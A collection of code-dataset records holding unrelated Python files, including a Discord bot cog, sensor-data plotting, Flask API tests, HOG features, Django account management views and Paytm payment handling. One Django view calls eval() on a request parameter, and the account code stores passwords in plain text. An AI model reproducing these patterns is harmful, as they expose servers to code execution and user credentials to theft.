`{prefix_org}`\")\n\n await posts.update_one({\"guild_id\": ctx.guild.id}, {\"$set\": {\"prefix\": new_prefix}})\n await ctx.send(f\"New prefix is `{new_prefix}` from `{prefix_org}`\")\n\n @commands.command(name='logchannel', aliases=[\"setlogchannel\", \"logschannel\"], usage=\"logchannel #channel\")\n @tools.has_perm(manage_guild=True)\n async def logchannel(self, ctx, *, channel: discord.TextChannel = None):\n if channel is None:\n channel = ctx.channel\n\n db = self.database.bot\n posts = db.serversettings\n channel_org = 0\n\n async for x in posts.find({\"guild_id\": ctx.guild.id}):\n channel_org = x[\"log_channel\"]\n\n await posts.update_one({\"guild_id\": ctx.guild.id}, {\"$set\": {\"log_channel\": channel.id}})\n if channel_org != 0:\n await ctx.send(f\"New log channel is <#{channel.id}> from <#{channel_org}>\")\n else:\n await ctx.send(f\"New log channel is <#{channel.id}>\")\n\n\ndef setup(bot):\n bot.add_cog(Settings(bot))\n","sub_path":"cogs/serversettings.py","file_name":"serversettings.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"230780748","text":"from pymongo import MongoClient\nimport datetime\nimport pprint\nimport json\nimport matplotlib.pyplot as plt\nfrom scipy import signal\n# from scipy import fftpack\n# while 1:\n\n\ndef remove_noise(data):\n\tfor index,value in enumerate(data):\n\t\tif value < -40:\n\t\t\tdata[index] = -70\n\n\treturn data\t\t\t\t\t\n \ndef generate_time_series(freqs, times, power):\n\tnew_power = []\n\tnew_time = []\n\tmax_power = min(power[0])\n\tnew_power.append(max_power)\n\tindex = power[0].index(max_power)\n\tnew_time.append(times[0][index])\n\tprint(index)\n\tprint(len(freqs))\n\tfor i in range(1,len(freqs)-1):\n\t\t# print(len(power[i]), len(times[i]), )\n\t\tnew_power.append(power[i][index])\n\t\tnew_time.append(times[i][index])\n\treturn new_power,new_time\t\n\ndef filter(s1_freq_samples,s1_time_samples,s1_power_samples):\n\tnew_freq = []\n\tnew_power = []\n\tnew_time = []\n\tfor i,f in enumerate(s1_freq_samples):\n\t\tif(len(f) == 5):\n\t\t\tnew_freq.append(f)\n\t\t\tnew_power.append(s1_power_samples[i])\n\t\t\tnew_time.append(s1_time_samples[i])\n\t\telse:\n\t\t\tprint(\"ANOMALY FOUND\")\n\t\t\tprint(len(f))\n\t\t\tprint(f)\n\t\t\tprint(\"+++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n\treturn(new_freq,new_time,new_power)\t\t\n\n\n\n\nclient = MongoClient('mongodb://130.245.144.129:27017/')\n# print (client.database_names())\ndb = client['kaa']\n# print (db.collection_names())\ncollection = db['logs_94543827559106667076']\n# print (db)\n# print (collection)\ncursor = collection.find({})\ndata = []\n# f= open(\"data.txt\",\"w+\")\nfor document in cursor:\n\tdata.append(document)\n\nprint (data[0]['event']['nodenumber'])\nsensor1_time = []\nsensor1_power = []\nsensor1_freq = []\nfor element in data:\n\t# if(element['event']['nodenumber'] == '9c:b6:d0:e9:73:4d'):\n\tsensor1_time.append(element['event']['timestamp'])\n\tsensor1_power.append(element['event']['power'])\n\tsensor1_freq.append(element['event']['frequency'])\n\n\t\t\n\n\n\n\npoints_1 = zip(sensor1_time,sensor1_freq,sensor1_power)\n\n\nsorted_points_1 = sorted(points_1)\n\n\nnew_sensor1_freq = [point[1] for point in sorted_points_1]\n\n\nnew_sensor1_time = [point[0] for point in sorted_points_1]\n\n\n\nnew_sensor1_power = [point[2] for point in sorted_points_1]\n\n\nstrart_value = new_sensor1_freq[0]\nstart_index = 0\ncount = 0\ns1_freq_samples = 
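
# --- Editor's sketch. The settings cog above iterates "async for" over a
# full find() just to read one document's field; with Motor (assumed from
# the async API) find_one() says that directly. A no-database stand-in to
# show the shape:
import asyncio

class FakeCollection:
    # Minimal stand-in for a motor collection, only for this demo.
    def __init__(self, doc):
        self._doc = doc

    async def find_one(self, query):
        return self._doc

async def main():
    posts = FakeCollection({"guild_id": 1, "prefix": "!"})
    settings = await posts.find_one({"guild_id": 1})
    print(settings["prefix"] if settings else None)  # -> !

asyncio.run(main())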
[]\ns1_power_samples = []\ns1_time_samples = []\nfor index, freq in enumerate(new_sensor1_freq):\n\tif index == 0:\n\t\tcount = count + 1\n\telif count > 0 and freq == strart_value:\n\t\tend_value = new_sensor1_freq[index-1]\n\t\tend_index = index-1\n\t\t# print(start_index,end_index, freq, new_sensor1_freq[index-1], index)\n\t\t# print('****************************************************')\n\t\t# print(len(new_sensor1_freq[start_index:end_index]))\n\t\t# print(new_sensor1_freq[start_index:end_index])\n\n\t\ts1_time_samples.append(new_sensor1_time[start_index:end_index])\n\t\ts1_power_samples.append(new_sensor1_power[start_index:end_index])\n\t\ts1_freq_samples.append(new_sensor1_freq[start_index:end_index])\n\t\tstart_index = index\n\ns1_time_samples.append(new_sensor1_time[start_index:-1])\ns1_power_samples.append(new_sensor1_power[start_index:-1])\ns1_freq_samples.append(new_sensor1_freq[start_index:-1])\n\n\n\n\n\n\n\n\n\ntotal_sweeps = len(s1_freq_samples) \n\n\n\n\ns1_freq_samples,s1_time_samples,s1_power_samples = filter(s1_freq_samples ,s1_time_samples, s1_power_samples)\nnew_power,new_time = generate_time_series(s1_freq_samples,s1_time_samples,s1_power_samples)\n\n \nnum_bins = 20\n# the histogram of the data\nn, bins, patches = plt.hist(new_power, num_bins, normed=1, facecolor='blue', alpha=0.5)\n \n# add a 'best fit' line\n# y = mlab.normpdf(bins, mu, sigma)\n# plt.plot(bins, new_power, 'r--')\nplt.xlabel('Power')\nplt.ylabel('Probability')\n# plt.title(r'Histogram of IQ: $\\mu=100$, $\\sigma=15$')\n \n# Tweak spacing to prevent clipping of ylabel\n# plt.subplots_adjust(left=0.15)\nplt.show()\n\n\n# fig = plt.figure(1)\n# plt.plot(new_time,new_power)\n# plt.show()\n\n","sub_path":"single_sensor.py","file_name":"single_sensor.py","file_ext":"py","file_size_in_byte":3805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"191835821","text":"import wx\nimport os, sys, traceback, subprocess\nfrom include.log_conf import info, error, er\nfrom pprint import pprint as pp\nhome=os.path.dirname(sys.argv[0])\nif not home :\n\thome=os.path.dirname(os.path.abspath(__file__))\n\t\n\nEDITOR = r'C:\\tmp\\Notepad++\\notepad++.exe'\n\n\nimport collections\nPageType = collections.namedtuple('PageType', ['host', 'app'])\nPAGE_TYPE = PageType(0, 1)\n\n\ndef format_stacktrace():\n\tparts = [\"Traceback (most recent call last):\\n\"]\n\tparts.extend(traceback.format_stack(limit=50)[:-2])\n\tparts.extend(traceback.format_exception(*sys.exc_info())[1:])\n\treturn \"\".join(parts)\n\t\n\n\ndef open_editor(fn, ln=0, win=None, cdir=None):\n\ttry:\n\t\tif cdir: os.chdir(cdir)\n\t\tassert os.path.isfile(fn), 'Cannot open file \"%s\" [%s]' % (fn, os.getcwd())\n\n\t\t\n\t\t#info('Editing 1 \"%s\"' % fn)\n\t\tif ln:\n\t\t\tsubprocess.call([EDITOR, fn, '-n%d' % ln])\n\t\telse:\n\t\t\tsubprocess.call([EDITOR, fn])\n\texcept:\n\t\traise\n\t\tif 0:\n\t\t\timport inspect\n\t\t\t#pp (traceback.format_stack(limit=500))\n\t\t\tfrm = inspect.trace()\n\t\t\t#pp(frm)\n\t\t\tmod = inspect.getmodule(frm[0])\n\t\t\tmodname = mod.__name__ if mod else frm[1]\n\t\t\t#print ('Thrown from', modname)\n\t\t\n\t\tif 1:\n\t\t\tprint(format_stacktrace())\n\t\tif 0:\n\t\t\texc_type, exc_value, exc_traceback = sys.exc_info()\n\t\t\tprint (\"*** print_tb:\")\n\t\t\ttraceback.print_tb(exc_traceback, limit=50, file=sys.stdout)\n\t\t\tprint (\"*** print_exception:\")\n\t\t\ttraceback.print_exception(exc_type, exc_value, exc_traceback,\n\t\t\t\t\t\t\t\t\t limit=50, 
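
# --- Editor's sketch. single_sensor.py above segments the frequency stream
# into sweeps by cutting every time the first frequency value reappears;
# the segmentation isolated:
def split_sweeps(freqs):
    start, sweeps, current = freqs[0], [], []
    for f in freqs:
        if f == start and current:
            sweeps.append(current)
            current = []
        current.append(f)
    if current:
        sweeps.append(current)
    return sweeps

print(split_sweeps([100, 200, 300, 100, 200, 300]))
# -> [[100, 200, 300], [100, 200, 300]]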
file=sys.stdout)\n\t\tif 0:\n\t\t\texc_type, exc_value, exc_traceback = sys.exc_info()\n\t\t\tprint (\"*** print_exc:\")\n\t\t\ttraceback.print_exc()\n\t\t\tprint (\"*** format_exc, first and last line:\")\n\t\t\tformatted_lines = traceback.format_exc().splitlines()\n\t\t\tprint (formatted_lines[0])\n\t\t\tprint (formatted_lines[-1])\n\t\t\tprint (\"*** format_exception:\")\n\t\t\tprint (repr(traceback.format_exception(exc_type, exc_value,\n\t\t\t\t\t\t\t\t\t\t\t\t exc_traceback)))\n\t\t\tprint (\"*** extract_tb:\")\n\t\t\tprint (repr(traceback.extract_tb(exc_traceback)))\n\t\t\tprint (\"*** format_tb:\")\n\t\t\tprint (repr(traceback.format_tb(exc_traceback)))\n\t\t\tprint (\"*** tb_lineno:\", exc_traceback.tb_lineno)\n\t\n\t\tif 0:\n\t\t\tstacktrace = format_stacktrace()\n\t\t\terror(stacktrace)\n\n\t\t\tif 1:\n\t\t\t\timport dialog.ErrDlg as ED\n\t\t\t\tED.show(stacktrace, win)\n\t\t\tif 0:\n\t\t\t\tdlg = wx.MessageDialog(win, stacktrace,\n\t\t\t\t\t'Cannot open file',\n\t\t\t\t\twx.OK | wx.ICON_INFORMATION\n\t\t\t\t\t#wx.YES_NO | wx.NO_DEFAULT | wx.CANCEL | wx.ICON_INFORMATION\n\t\t\t\t\t)\n\t\t\t\tdlg.ShowModal()\n\t\t\t\tdlg.Destroy()\n\t\t\t\t","sub_path":"include/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"348331776","text":"# coding: utf-8\n\nimport unittest\n\nfrom json import loads as json_loads\n\nfrom attrdict import AttrDict\n\nimport api\n\n\nclass TestBrasilIOAPI(unittest.TestCase):\n def setUp(self):\n api.app.config['TESTING'] = True\n self.app = api.app.test_client()\n\n def json_get(self, url, status_code=False, follow_redirects=True):\n response = self.app.get(url, follow_redirects=follow_redirects)\n content_type = response.headers['Content-Type'].split(';')[0].strip()\n if content_type == 'application/json':\n data = AttrDict(json_loads(response.data))\n else:\n data = AttrDict({'data': response.data})\n if status_code:\n data.status_code = response.status_code\n return data\n\n @unittest.skip('TODO: implementar')\n def test_meta(self):\n response = self.json_get('/')\n self.assertIn('meta', response)\n meta = response.data['meta']\n\n @unittest.skip('TODO: implementar')\n def test_regioes(self):\n response = self.json_get('/')\n self.assertIn('regioes', response)\n regioes = response.regioes\n\n def test_listagem_de_unidades_federativas(self):\n response = self.json_get('/')\n self.assertIn('unidades_federativas', response)\n unidades_federativas = response.unidades_federativas\n self.assertEqual(len(unidades_federativas), 27)\n\n chaves_necessarias = {'codigo-ibge', 'url', 'sigla', 'nome'}\n for uf in unidades_federativas:\n self.assertEqual(set(uf.keys()), chaves_necessarias)\n self.assertEqual(uf['url'][-1], '/')\n\n nomes = [uf['nome'] for uf in unidades_federativas]\n self.assertEqual(sorted(nomes), nomes)\n\n self.assertEqual(self.json_get('/rj/'), self.json_get('/rj'))\n self.assertEqual(self.json_get('/rj/'), self.json_get('/RJ/'))\n\n def test_unidade_federativa_nao_existe(self):\n erro_esperado = u'Unidade Federativa não encontrada.'\n nao_existe = self.json_get('/na', status_code=True)\n self.assertEqual(nao_existe.status_code, 404)\n self.assertEqual(nao_existe.erro, erro_esperado)\n nao_existe = self.json_get('/ab/non-ecziste', status_code=True)\n self.assertEqual(nao_existe.erro, erro_esperado)\n self.assertEqual(nao_existe.status_code, 404)\n self.assertEqual(nao_existe.erro, erro_esperado)\n\n def 
test_listagem_de_municipios_possui_chaves_necessarias(self):\n chaves_necessarias = {'codigo-ibge', 'url', 'sigla', 'nome',\n 'municipios'}\n unidades_federativas = self.json_get('/').unidades_federativas\n for uf in unidades_federativas:\n municipios_uf = self.json_get(uf['url'])\n self.assertEqual(set(municipios_uf.keys()), chaves_necessarias)\n\n def test_municipios_possuem_chaves_necessarias(self):\n rj = self.json_get('/rj')\n self.assertEqual(len(rj.municipios), 92)\n\n chaves_necessarias = {'codigo-ibge', 'url', 'nome'}\n for municipio in rj.municipios:\n self.assertEqual(set(municipio.keys()), chaves_necessarias)\n\n def test_municipios_aparecem_em_ordem_alfabetica(self):\n unidades_federativas = self.json_get('/').unidades_federativas\n for uf in unidades_federativas:\n municipios = self.json_get(uf['url']).municipios\n nomes = []\n for municipio in municipios:\n nomes.append(municipio['nome'])\n self.assertEqual(municipio['url'][-1], '/')\n self.assertEqual(nomes, sorted(nomes))\n\n def test_municipio_nao_existe(self):\n nao_existe = self.json_get('/rj/non-ecziste', status_code=True)\n self.assertEqual(nao_existe.status_code, 404)\n self.assertEqual(nao_existe.erro, u'Município não encontrado.')\n\n def test_municipio_deve_retornar_chaves_necessarias(self):\n tres_rios = self.json_get('/rj/tres-rios', status_code=True,\n follow_redirects=False)\n self.assertEqual(tres_rios.status_code, 301)\n self.assertEqual(self.json_get('/rj/tres-rios'),\n self.json_get('/rj/tres-rios/'))\n\n tres_rios = self.json_get('/rj/tres-rios/')\n chaves_necessarias = {'codigo-ibge', 'url', 'nome'} # TODO: ?\n self.assertEqual(set(tres_rios.keys()), chaves_necessarias)\n\n def test_deve_aceitar_requisicoes_jsonp(self):\n content_type = 'Content-Type'\n json_type = 'application/json'\n jsonp_type = 'application/javascript'\n urls = ['/', '/rj/', '/rj/tres-rios/']\n\n for url in urls:\n normal = self.app.get(url)\n jsonp = self.app.get(url + '?callback=myCallback')\n self.assertEqual('myCallback({});'.format(normal.data), jsonp.data)\n self.assertEqual(normal.headers[content_type], json_type)\n self.assertEqual(jsonp.headers[content_type], jsonp_type)\n\n def test_deve_aceitar_requisicoes_cors_simples(self):\n content_type = 'Content-Type'\n expected_type = 'application/json'\n urls = ['/', '/rj/', '/rj/tres-rios/']\n\n for url in urls:\n normal = self.app.get(url)\n self.assertNotIn('Access-Control-Allow-Origin', normal.headers)\n self.assertEqual(normal.headers[content_type], expected_type)\n\n cors = self.app.get(url, headers={'Origin': 'http://example.com'})\n self.assertIn('Access-Control-Allow-Origin', cors.headers)\n self.assertEqual(cors.headers['Access-Control-Allow-Origin'], '*')\n self.assertEqual(cors.headers[content_type], expected_type)\n","sub_path":"test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":5606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"10313888","text":"'''\nCreated on Oct 19, 2019\n\n@author: jsaavedr\n'''\n\nimport skimage.feature as feat\nimport skimage.transform as trans\nimport pai\nimport sys\nimport numpy as np\n\nclass HOG :\n def __init__(self, image_size= (128,128), orientations = 8, grid_size = (4,4)):\n self.image_size = image_size\n self.orientations = orientations #number of orientations\n self.grid_size = grid_size # numberl of blocks\n \n def get_lenght(self):\n return self.orientations * self.grid_size[0] * self.grid_size[1]\n\n def get_hog(self, image):\n image = 
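
# --- Editor's sketch. The JSONP test above expects the API to wrap its JSON
# body in the callback named by ?callback= and switch the content type; the
# wrapping rule itself is tiny (framework-free, names illustrative):
import json

def jsonp_wrap(payload, callback=None):
    body = json.dumps(payload)
    if callback:
        return "%s(%s);" % (callback, body), "application/javascript"
    return body, "application/json"

print(jsonp_wrap({"ok": True}, "myCallback"))
# -> ('myCallback({"ok": true});', 'application/javascript')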
trans.resize(image, self.image_size)\n image = pai.to_uint8(image) \n fd = feat.hog(image, orientations= self.orientations,\n pixels_per_cell=(self.image_size[0]/self.grid_size[0], \n self.image_size[1]/self.grid_size[1]), \n cells_per_block=(1, 1), feature_vector = True)\n #normalizing the feature vector\n fd = np.sqrt(fd)\n norm = np.sqrt(np.dot(fd, fd));\n fd = fd / norm \n return fd\n\n#\nif __name__ == '__main__' : \n filename = sys.argv[1]\n image = pai.imread(filename, as_gray = True)\n hog = HOG() \n h = hog.get_hog(image)\n\n norm = np.sqrt(np.dot(h, h));","sub_path":"hog_features.py","file_name":"hog_features.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"349367116","text":"import json\nimport yaml\nimport os.path\n\nfrom collections import defaultdict\nfrom google.appengine.ext import webapp\nfrom google.appengine.api import urlfetch\n\nfrom app.tasks.getversions import testHandler\nfrom app.helpers import template\nfrom app.helpers import ghAuth\n\n\n\"\"\" API URL to pull requests for the project registry\n\"\"\"\ndef pullRequestApiUrl():\n return ghAuth('https://api.github.com/repos/version-is/version.is-sources/pulls')\n\n\n\"\"\" parse yaml file\n\"\"\"\ndef parseYamlFile(url):\n response = []\n # Get yaml file\n rawfile = urlfetch.fetch(url).content\n rawfile = yaml.load(rawfile)\n # Validate each yaml object\n for project in rawfile:\n data = defaultdict()\n\n try:\n\n data['project'] = project\n data['name'] = rawfile[project]['name']\n data['website'] = rawfile[project]['website']\n data['handler'] = rawfile[project]['handler']\n data['handler_valid'] = testHandler(data['handler']['type'])[0]\n\n response.append(data)\n\n except KeyError:\n raise Exception('Invalid file: ' + url)\n\n return response\n\n\n\"\"\" Parse the pull request contents\n\"\"\"\ndef parsePullRequest(url):\n response = []\n # Get the list of files added in the pull request\n pullfiles = urlfetch.fetch(ghAuth(url + '/files'))\n pullfiles = json.loads(pullfiles.content)\n for pullfile in pullfiles:\n pulldata = defaultdict()\n pulldata['filename'] = pullfile['filename']\n pulldata['status'] = pullfile['status']\n pulldata['patch'] = pullfile['patch']\n pulldata['raw_url'] = pullfile['raw_url']\n pulldata['blob_url'] = pullfile['blob_url']\n pulldata['extension'] = os.path.splitext(pullfile['filename'])[1][1:]\n if pulldata['extension'] == 'yaml':\n pulldata['valid'] = True\n pulldata['data'] = parseYamlFile(pullfile['raw_url'])\n else:\n pulldata['valid'] = False\n pulldata['data'] = {}\n\n response.append(pulldata)\n\n return response\n\n\n\"\"\" Show a warning, if more than one file is changed\n\"\"\"\ndef testFileCount(filecount):\n return filecount != 1\n\n\n\"\"\" Get data about a pull request\n\"\"\"\ndef getPullRequestData(data):\n # Build a dict with information about the pull request\n pulldata = defaultdict()\n\n # Get the pullreq number\n pulldata['number'] = data['number']\n # Get the link to the pull req\n pulldata['link'] = data['_links']['html']['href']\n # Get data about the files in the pull request\n pulldata['files'] = parsePullRequest(data['url'])\n # Bool: Is there more than one file?\n pulldata['file_count_warning'] = testFileCount(len(pulldata['files']))\n\n return pulldata\n\n\n\"\"\" Get data about the open pull requests\n\"\"\"\ndef getPullRequests():\n # Fetch the json object with all pull requests\n pullreqs = urlfetch.fetch(pullRequestApiUrl()).content\n pullreqs = 
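
# --- Editor's sketch. get_hog() above square-roots the descriptor and then
# divides by its L2 norm (a Hellinger-style normalization). That step in
# isolation, with a small epsilon added here to guard an all-zero vector:
import numpy as np

def hellinger_normalize(fd, eps=1e-12):
    fd = np.sqrt(np.asarray(fd, dtype=float))
    return fd / (np.linalg.norm(fd) + eps)

v = hellinger_normalize([4.0, 1.0, 0.0])
print(v, float(np.dot(v, v)))  # unit L2 norm -> ~1.0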
json.loads(pullreqs)\n\n response = []\n\n # Get data for the open ones\n for pullreq in pullreqs:\n if pullreq['state'] == 'open':\n response.append(getPullRequestData(pullreq))\n\n return response\n\n\n\"\"\" Request handler\n\"\"\"\nclass ValidatePullReq(webapp.RequestHandler):\n def get(self):\n template_data = {\n 'title': 'Pull Requests',\n 'pullreqs': getPullRequests() # Get data\n }\n\n rendered = template.render('validate_pullreq', template_data)\n\n self.response.write(rendered) # Output the rendered data\n\n","sub_path":"app/tasks/validate_pullreq.py","file_name":"validate_pullreq.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"217346646","text":"from django.core.paginator import Paginator\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom Account.models import Account\nfrom User.models import User\n\n\ndef accountlist(request):\n\n # userid = request.session.get('user_id')\n #\n # print(userid)\n #\n # # user = User.objects.get(pk=userid)\n #\n # users = User.objects.filter(id=userid)\n #\n # if users.exists():\n\n idcardno = request.POST.get('idcard_no')\n realname = request.POST.get('real_name')\n loginname = request.POST.get('login_name')\n status = request.POST.get('status')\n\n # 可以直接在option中添加value属性 直接获取对应的value值\n # if status == '开通':\n # status = '0'\n # elif status == '暂停':\n # status = '1'\n # elif status == '删除':\n # status = '2'\n # else:\n # status = None\n\n\n search_dict = request.GET.get('search_dict')\n\n\n if not search_dict:\n search_dict = dict()\n else:\n search_dict = eval(search_dict)\n\n\n if idcardno:\n search_dict['idcard_no']=idcardno\n if realname:\n search_dict['real_name']=realname\n if loginname:\n search_dict['login_name']=loginname\n if status:\n search_dict['status'] = status\n\n # 如果字典中没有数据 那么就是查询的所有\n # 如果有数据 那么查询就是对应的过滤条件\n account_list = Account.objects.filter(**search_dict)\n\n page = int(request.GET.get('page',1))\n\n # account_list = Account.objects.all()\n\n pagin = Paginator(account_list,3)\n\n p = pagin.page(page)\n\n context = {\n 'pagin':pagin,\n 'p':p,\n 'pn':page,\n 'search_dict':search_dict\n }\n\n return render(request,'netctoss/account/account_list.html',context=context)\n # else:\n # return redirect(reverse('user:toLogin'))\n\n\ndef accountdelete(request):\n accountid = request.GET.get('accountid')\n\n account = Account.objects.get(pk=accountid)\n\n service_list = account.service_set.all()\n\n for service in service_list:\n service.status = '2'\n service.save()\n\n\n account.status = '2'\n\n account.save()\n\n\n data= {\n 'msg':'ok',\n 'status':200\n }\n return JsonResponse(data=data)\n\n\ndef accountstart(request):\n accountid = request.GET.get('accountid')\n\n account = Account.objects.get(pk=accountid)\n\n account.status = '0'\n\n account.pause_date = None\n\n account.save()\n\n data = {\n 'msg': 'ok',\n 'status': 200\n }\n return JsonResponse(data=data)\n\n\ndef accountToUpdate(request):\n id = request.GET.get('id')\n\n account = Account.objects.get(pk=id)\n\n idcardno = account.idcard_no\n\n # 210727 2000 05 01 xxxx\n # 2000/05/01\n year = idcardno[6:10]\n month = idcardno[10:12]\n day = idcardno[12:14]\n\n birth = year + '/' + month + '/' + day\n\n # 会有异常 原因是因为 如果该对象没有推荐人 那么推荐人的id就为空\n # 所以查询不到对象\n # 解决方法 如果没有推荐人 那么设置为‘’\n\n context = {\n 'account': account,\n 
'birth': birth\n }\n\n if account.recommender_id:\n a = Account.objects.get(pk=account.recommender_id)\n context['r_idcard_no'] = a.idcard_no\n\n\n\n return render(request,'netctoss/account/account_modi.html',context=context)\n\n\ndef accountToAdd(request):\n return render(request,'netctoss/account/account_add.html')\n\n\ndef accountAdd(request):\n print('111111')\n real_name = request.POST.get('real_name')\n idcard_no = request.POST.get('idcard_no')\n login_name = request.POST.get('login_name')\n login_passwd = request.POST.get('login_passwd')\n telephone = request.POST.get('telephone')\n # 推荐人的身份证 recommder_idcardno是一个隐藏域\n recommder_id = request.POST.get('recommder_idcardno')\n birthday = request.POST.get('birthday')\n email = request.POST.get('email')\n occupation = request.POST.get('occupation')\n sex = request.POST.get('sex')\n mailaddress = request.POST.get('mailaddress')\n zipcode = request.POST.get('zipcode')\n qq = request.POST.get('qq')\n\n print(recommder_id)\n\n # a = Account.objects.filter(idcard_no=recommder_idcardno).first()\n #\n # xxxx = a.id\n\n\n\n account = Account()\n # xxxx是根据recommder_idcardno 找到对应的account对象 在把 account的id 给 recommender_id\n account.recommender_id = recommder_id\n account.real_name=real_name\n account.idcard_no = idcard_no\n account.login_name = login_name\n account.login_passwd = login_passwd\n account.telephone = telephone\n account.birthdate = birthday\n account.email = email\n account.occupation = occupation\n account.gender = sex\n account.mailaddress = mailaddress\n account.zipcode = zipcode\n account.qq = qq\n\n account.save()\n\n\n\n return redirect(reverse('account:accountlist'))\n\n\ndef accountGetRecommderId(request):\n recommder_idcard = request.GET.get('recommder_idcard')\n\n account = Account.objects.filter(idcard_no=recommder_idcard).first()\n\n recommender_id = account.id\n\n data = {\n 'msg':'ok',\n 'status':200,\n 'recommender_id':recommender_id\n }\n return JsonResponse(data=data)\n\n\ndef accountCheckName(request):\n\n name = request.GET.get('name')\n\n accounts = Account.objects.filter(real_name=name)\n\n data = {\n\n }\n\n if accounts.exists():\n data['msg']='error'\n data['status']=404\n else:\n data['msg']='ok'\n data['status']=200\n\n return JsonResponse(data=data)\n\n@csrf_exempt\ndef accountPause(request):\n accountid = request.POST.get('accountid')\n account = Account.objects.get(pk=accountid)\n\n service_list = account.service_set.all()\n\n for service in service_list:\n service.status = 1\n service.save()\n\n\n account.status = 1\n\n account.save()\n\n data = {\n 'msg':'ok',\n 'status':200\n }\n\n return JsonResponse(data=data)","sub_path":"netctoss/Account1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"646952241","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport random\nimport time\nimport matplotlib.pyplot as plt\n\n\n# In[2]:\n\n\ndef create_cards(num_cards):\n cards = list(range(1,num_cards))\n random.shuffle(cards)\n return(cards)\n\ndef sorting(cards):\n for j in range(1, len(cards)):\n key = cards[j]\n i = j - 1\n while i >= 0 and cards[i] > key:\n cards[i+1] = cards[i]\n i -= 1\n cards[i+1]=key\n return(cards)\n \ndef iteration(number_iteration, number_cards):\n measure_time = []\n for i in range(0, number_iteration):\n cards = create_cards(number_cards)\n start = time.time()\n sorting(cards)\n measure_time.append(time.time()-start)\n average_time = 
sum(measure_time)/len(measure_time)\n print(\"Average time: \" + \"{0:.9f}\".format(average_time) + \" seconds\")\n return(average_time)\n\n\n# In[3]:\n\n\ntime_cards = []\n\nprint(\"Please wait some time... It's worth it!\")\n\nfor number_cards in range(10, 1000, 100):\n time_in_sec = iteration(1000, number_cards)\n time_cards.append(time_in_sec)\n\n\n# In[4]:\n\n\nplt.plot([10, 110, 210, 310, 410, 510, 610, 710, 810, 910], time_cards)\nplt.xlabel(\"Number cards\")\nplt.ylabel(\"Average runtime in seconds\")\nplt.title(\"Insertion sort algorithm runtime\")\nplt.show()\n\n","sub_path":"Insertion_Sort_Complexity_Analysis.py","file_name":"Insertion_Sort_Complexity_Analysis.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"5865121","text":"import paypal\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db.models import F\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_400_BAD_REQUEST\nfrom . import Checksum\nfrom .utils import VerifyPaytmResponse\nfrom .models import Transaction,UserProfile\nfrom datetime import datetime,timezone as tz\nfrom django.conf import settings\nfrom paypal.standard.forms import PayPalPaymentsForm\n\n@api_view([\"GET\"])\ndef get_transactions(request):\n \"\"\"\n :param request:\n :return: List of transactions based on user Transactions\n \"\"\"\n try:\n user = request.user\n user_id = User.objects.get(username=user)\n print(user_id)\n transactions = Transaction.objects.filter(user_id__user=user_id).values('status','amount','to_account','date','payment_method')\n print(transactions)\n return Response({\"transactions\":transactions})\n except Exception as e:\n print(e)\n return Response(\"Could Not List the Transactions\".format(str(e)), status=HTTP_400_BAD_REQUEST)\n\ndef payment(request):\n order_id = Checksum.__id_generator__()\n amount = \"1\"\n user = str(request.user)\n user_object = UserProfile.objects.filter(user__username=user).values('phone_number',email = F('user__email'))\n email = user_object[0]['email']\n phone_number = user_object[0]['phone_number']\n data_dict = {\n 'MID': settings.PAYTM_MERCHANT_ID,\n 'INDUSTRY_TYPE_ID': settings.PAYTM_INDUSTRY_TYPE_ID,\n 'WEBSITE': settings.PAYTM_WEBSITE,\n 'CHANNEL_ID': settings.PAYTM_CHANNEL_ID,\n 'CALLBACK_URL': settings.PAYTM_CALLBACK_URL,\n 'MOBILE_NO': str(phone_number),\n 'EMAIL': email,\n 'CUST_ID': '123123',\n 'ORDER_ID':order_id,\n 'TXN_AMOUNT': amount,\n }\n data_dict['CHECKSUMHASH'] = Checksum.generate_checksum(data_dict, settings.PAYTM_MERCHANT_KEY)\n user_profile_object = UserProfile.objects.get(user__username=user)\n # Initiate Transaction\n Transaction.objects.get_or_create(user_id = user_profile_object,id =order_id)\n context = {\n 'payment_url': settings.PAYTM_PAYMENT_GATEWAY_URL,\n 'comany_name': settings.PAYTM_COMPANY_NAME,\n 'data_dict': data_dict\n }\n return render(request, 'paytm.html', context)\n\n\n\n@csrf_exempt\n@api_view([\"POST\"])\ndef paytm_response(request):\n \"\"\"\n Paytm call back url to save the transaction Details\n \"\"\"\n resp = VerifyPaytmResponse(request)\n if resp['verified']:\n response = resp['paytm']\n try:\n txn_object = 
